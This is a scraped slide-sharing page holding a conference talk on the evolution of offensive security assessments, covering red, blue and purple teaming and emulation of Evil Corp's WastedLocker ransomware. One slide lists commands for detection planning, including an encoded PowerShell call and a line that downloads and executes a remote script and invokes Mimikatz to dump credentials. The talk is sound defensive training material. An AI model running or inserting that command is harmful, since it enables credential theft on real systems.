Emerging Threats to Infrastructure
Emerging Threats to InfrastructureEmerging Threats to Infrastructure
Emerging Threats to Infrastructure
 
Windows 7 Security
Windows 7 SecurityWindows 7 Security
Windows 7 Security
 

Kürzlich hochgeladen

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 

Evolution of Offensive Assessments - RootCon

  • 3. @brysonbort @jorgeorchilles T1033 - System Owner/User Discovery ● Chief Technology Officer - SCYTHE ● Purple Team Exercise Framework (PTEF) ● C2 Matrix Co-Creator ● 10 years @ Citi leading offensive security team ● Certified SANS Instructor: SEC560, SEC504 ● Author SEC564: Red Team Exercises and Adversary Emulation ● CVSSv3.1 Working Group Voting Member ● GFMA: Threat-Led Pentest Framework ● ISSA Fellow; NSI Technologist Fellow 3
  • 4. @brysonbort @jorgeorchilles Evolution of Offensive Security https://www.scythe.io/library/scythes-ethical-hacking-maturity-model 4 ● Based on various organization’s experience ● Not a step-by-step guide, but could serve as a baseline for improvement ● You can skip steps based on business requirements and goals ● Every organization is different ● Continuous improvement should not halt previous assessment types
  • 5. @brysonbort @jorgeorchilles A Long, Long, Long Time Ago 5 1992 - First commercial firewall 2000 +/- - Firewalls are “common” Networks are flat Remember Windows 95 / NT? What was manual: ● Vulnerabilities in internet facing services (T1190) ● Abusing internet-facing authentication mechanisms (T1133, T1078)
  • 6. @brysonbort @jorgeorchilles Vulnerability Assessment 6 Vulnerabilities in internet facing services (T1190) Abusing internet-facing authentication mechanisms (T1133, T1078) + Severity
  • 10. @brysonbort @jorgeorchilles 10 Exploitation in MITRE ATT&CK 6 techniques w/“exploit” (out of 184) “Initial Access” - 9 Techniques
  • 13. @brysonbort @jorgeorchilles Red Team 13 Goal: ● Test and measure people, process, and technology ● Make Blue Team better ● Assure business RECON Access Post-Access
  • 14. @brysonbort @jorgeorchilles Red Team: Access 1. Exploitable vulnerabilities in internet facing services (T1190) 2. Abusing internet-facing authentication mechanisms (T1133, T1078) 3. Phishing for malware execution (T1192, T1193, T1194; phishing for credentials is really just #2 above) 4. Gaining physical access to a network and connecting a rogue device (T1200, T1091) 5. Supply Chain Attacks (T1195, T1199) 14 https://medium.com/@malcomvetter/how-we-breached-your-network-755e40f52d85
  • 15. @brysonbort @jorgeorchilles Red Team: Assumed Breach 15 RECON Access Post-Access Business Value
  • 18. @brysonbort @jorgeorchilles Purple Team Exercises 18 ● Virtual, functional team where teams work together to measure and improve defensive security posture (people, process, and technology) ○ CTI provides threat actor with capability, intent, and opportunity to attack ○ Red Team creates adversary emulation plan ○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses ○ Emulation of each adversary behavior (TTPs) ○ Blue Team looks for indicators of behavior and/or improvement opportunities ○ Red and Blue work together to create remediation action plan ○ Repeat for next set of TTPs
  • 19. @brysonbort @jorgeorchilles Blue Team 19 ● Log ○ Relevant Events ○ Locally ○ Central Log Aggregator ● Alert ○ Severity ● Respond ○ Process ○ People ○ Automation ● Definition: ○ Defenders in an organization entrusted with identifying and remediating attacks. ○ Generally associated with Security Operations Center or Managed Security Service Provider (MSSP), Hunt Team, Incident Response, and Digital Forensics, Managed Detection and Response (MDR). ○ Really, it is everyone's responsibility! ● Goal: ○ Identify, contain, eradicate attacks
  • 20. @brysonbort @jorgeorchilles Single TTP? ● What is the expected Blue Team log, alert, and/or response from: ○ whoami - T1033; T1059.003 ○ ipconfig - T1016; T1059.003 ○ powershell whoami - T1033; T1059.001 ○ powershell -exec bypass -nop -enc dwBoAG8AYQBtAGkA - T1033; T1132.001; T1059.001 ○ powershell "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" - T1003; T1059.001; ● Each procedure can, and most likely will, include multiple TTPs ● Adversary is not going to just perform the one TTP ● Let’s chain these TTPs together to create an attack chain 20
  • 21. @brysonbort @jorgeorchilles Adversary Emulation ● Definition: ○ A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries. ○ Leverage Cyber Threat Intelligence to emulate an attacker likely to attack the organization ● Goal: ○ Emulate an adversary attack chain or scenario ○ Understand organization’s preparedness if under a real, sophisticated attack ● Effort: ○ Manual ● Customer: ○ Entire organization 21 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
  • 22. @brysonbort @jorgeorchilles #ThreatThursday ● Choose an adversary ○ Introduce Adversary ○ Consume CTI and map to MITRE ATT&CK w/Navigator Layer ○ Create Adversary Emulation Plan ○ Share the plan on SCYTHE Community Threat Github: https://github.com/scythe-io/community-threats/ ○ Emulate Adversary with video ○ How to defend against adversary ● All free for the community: https://www.scythe.io/threatthursday 22
  • 23. @brysonbort @jorgeorchilles For example… Garmin - I see you #RedTeamFit ● July 22 - 29, 2020 ● GarminConnect, FlyGarmin, all down -> ● Evil Corp using WastedLocker 23 https://techcrunch.com/2020/07/25/garmin-outage-ransomware-sources/
  • 24. @brysonbort @jorgeorchilles Ugh… Ransomware? Boring! But wait… $$ ● Get access to a target system or network (targeted or opportunist) ● Encrypt files - 3 methods: a. Read the file, create an encrypted version of the file, replace the original file with the encrypted one b. Use raw disk access for encryption c. Open the file, encrypt the contents and save the file (no file deletion or creation) ● Steal the files? Sometimes ● Download a ransom note asking for payment in crypto or else!!! ● Get PAID!!! $$$ ฿฿฿ ₿₿₿ 24
  • 25. @brysonbort @jorgeorchilles Evil Corp ● SocGholish is delivered to the victim in a zipped file via compromised legitimate websites ● Zip file with malicious JavaScript, masquerading as a browser update ● A second JavaScript file profiles the computer and uses PowerShell to download additional discovery related PowerShell scripts ● Once the attackers gain network access, they use PS to drop a Cobalt Strike beacon to leverage living-off-the-land tools to steal credentials, escalate privileges, and move across the network ● Then they deploy WastedLocker malware on multiple computers 25 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
  • 26. @brysonbort @jorgeorchilles Evil Corp ● SocGholish is delivered to the victim in a zipped file via compromised legitimate websites ● Zip file with malicious JavaScript, masquerading as a browser update ● A second JavaScript file profiles the computer and uses PowerShell to download additional discovery related PowerShell scripts ● Once the attackers gain network access, they use PS to drop a Cobalt Strike beacon to leverage living-off-the-land tools to steal credentials, escalate privileges, and move across the network ● Then they deploy WastedLocker malware on multiple computers 26 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/ Thanks @bryceabdo
  • 27. @brysonbort @jorgeorchilles ATT&CK Navigator 27 ● No MITRE ATT&CK Mapping for Evil Corp or WastedLocker ● Manually extracted TTPs from Cyber Threat Intelligence ● Created MITRE ATT&CK Navigator Layer: https://github.com/scythe-io/community-threats/blob/m aster/EvilCorp/EvilCorp-WastedLocker_layer.json
  • 28. @brysonbort @jorgeorchilles Emulating Ransomware? ● Is emulating ransomware even possible? ● Of course it is! ● The secret is to not encrypt or destroy production data. ● Instead create new files before emulating typical ransomware steps of encrypting, exfiltrating, and obtaining a ransom note. ● This method ensures no data is ever at risk of being encrypted, destroyed, or leaked. 28
  • 30. @brysonbort @jorgeorchilles SHOW VALUE!!!! ● That is what we are here for… providing business value! ● Use VECTR to propose your Adversary Emulation Plan ● Track each engagement, each improvement, each blue team and red team win! ● Show improvement over time ● This will make you part of a Program including people, process, and technology 30
  • 31. @brysonbort @jorgeorchilles Attack Tools: C2 Matrix ● Collaborative Evaluation ● Google Sheet of C2s ○ 50+ frameworks ● www.thec2matrix.com ● FOLLOW @C2_Matrix ● SANS Slingshot 31
  • 32. @brysonbort @jorgeorchilles Attack Infrastructure with RedELK 32 ● RedELK - centralized logging for Red Team and White Cell ● Also amazing graph for this talk ->> ● https://github.com/outflan knl/RedELK/ ● Created by Marc/Outflank: ○ @MarcOverIP ○ @OutflankNL
  • 33. @brysonbort @jorgeorchilles Other considerations ● It's okay to deviate from plan to accomplish objective ● TTPs from MITRE ATT&CK are dated ○ Must be seen in the wild first; they can be years old ● Security tools/processes make some TTPs very difficult to pull off ○ This is okay, document the good and the bad ○ Give credit when and where due ● Avoiding Heartbeat Detection - 30 mins seems to be current magic # ● Everything done here today was with free tools ○ You may want to consider enterprise tools, for your enterprise. 33
  • 35. @brysonbort @jorgeorchilles Shameless Plugs ● Hands-On Purple Team Workshop - October 15, October 29, November 12 ○ Sign up: http://scythe.io/workshops ● SEC564 Live Online - https://sans.org/sec564 ○ Singapore - October 19-22 ○ HackFest - November 16-17 ● RoundUp on Adversary Emulation - October 22: ○ https://wildwesthackinfest.com/the-roundup/ ● Purple Team Summit - November 13 ○ Free Workshops on November 12 ○ CFP: https://www.scythe.io/purple-team-summit 35
  • 36. @brysonbort @jorgeorchilles References 36 ● Ethical Hacking Maturity Model: https://www.scythe.io/library/scythes-ethical-hacking-maturity-model ● Definitions: https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Cyber Defense Matrix: https://cyberdefensematrix.com/ ● Purple Team Exercise Framework: https://www.scythe.io/ptef ● #ThreatThursday: https://www.scythe.io/threatthursday ● C2 Matrix: https://thec2matrix.com https://howto.thec2matrix.com ● RedELK: https://github.com/outflanknl/RedELK/ ● VECTR: https://vectr.io/ ● SCYTHE emulation plans: https://github.com/scythe-io/community-threats/ ● Caldera: https://github.com/mitre/caldera